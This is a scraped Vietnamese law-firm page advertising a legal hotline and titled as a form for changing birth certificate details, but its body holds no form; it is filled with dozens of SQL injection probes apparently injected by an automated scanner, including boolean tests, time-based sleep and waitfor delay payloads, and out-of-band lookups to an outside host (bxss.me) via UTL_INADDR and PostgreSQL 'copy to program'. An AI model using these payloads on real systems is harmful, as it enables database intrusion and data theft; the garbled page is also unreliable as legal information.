Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Tờ khai đăng kí thay đổi nội dung giấy khai sinh

Cập nhật lần cuối lúc 13:58 ngày 12/07/2013

Nguồn: Công ty Luật Vinabiz/ Nguoiduatin.vn
1
1
1
1
-1 OR 2+624-624-1=0+0+0+1 --
-1 OR 3+624-624-1=0+0+0+1 --
-1 OR 3*2<(0+5+624-624) --
-1 OR 3*2>(0+5+624-624) --
-1 OR 2+648-648-1=0+0+0+1
-1 OR 3+648-648-1=0+0+0+1
-1 OR 3*2<(0+5+648-648)
1'"
-1 OR 3*2>(0+5+648-648)
\
-1' OR 2+838-838-1=0+0+0+1 --
-1' OR 3+838-838-1=0+0+0+1 --
1
-1' OR 3*2<(0+5+838-838) --
-1' OR 3*2>(0+5+838-838) --
@@QKPK2
-1' OR 2+111-111-1=0+0+0+1 or 'OgqsSTPm'='
-1' OR 3+111-111-1=0+0+0+1 or 'OgqsSTPm'='
JyI=
-1' OR 3*2<(0+5+111-111) or 'OgqsSTPm'='
-1' OR 3*2>(0+5+111-111) or 'OgqsSTPm'='
-1" OR 2+569-569-1=0+0+0+1 --
-1" OR 3+569-569-1=0+0+0+1 --
-1" OR 3*2<(0+5+569-569) --
-1" OR 3*2>(0+5+569-569) --
if(now()=sysdate(),sleep(13.968000000000001),0)/*'XOR(if(now()=sysdate(),sleep(13.968000000000001),0))OR'"XOR(if(now()=sysdate(),sleep(13.968000000000001),0))OR"*/
(select(0)from(select(sleep(13.968000000000001)))v)/*'+(select(0)from(select(sleep(13.968000000000001)))v)+'"+(select(0)from(select(sleep(13.968000000000001)))v)+"*/
-1; waitfor delay '0:0:13.968000000000001' --
-1); waitfor delay '0:0:4.656000000000001' --
1 waitfor delay '0:0:4.656000000000001' --
1 waitfor delay '0:0:9.312000000000001' --
SHtxTaEq'; waitfor delay '0:0:9.312000000000001' --
-1;select pg_sleep(9.312000000000001); --
-1);select pg_sleep(9.312000000000001); --
-1));select pg_sleep(13.968000000000001); --
tJmPmbde';select pg_sleep(4.656000000000001); --
V6MM59MI');select pg_sleep(4.656000000000001); --
rJFAqhI0'));select pg_sleep(9.312000000000001); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6099.34060.c0abb.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6100.34060.c0abb.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-6101.34060.c0abb.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-6102.34060.c0abb.\1.bxss.me
150'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: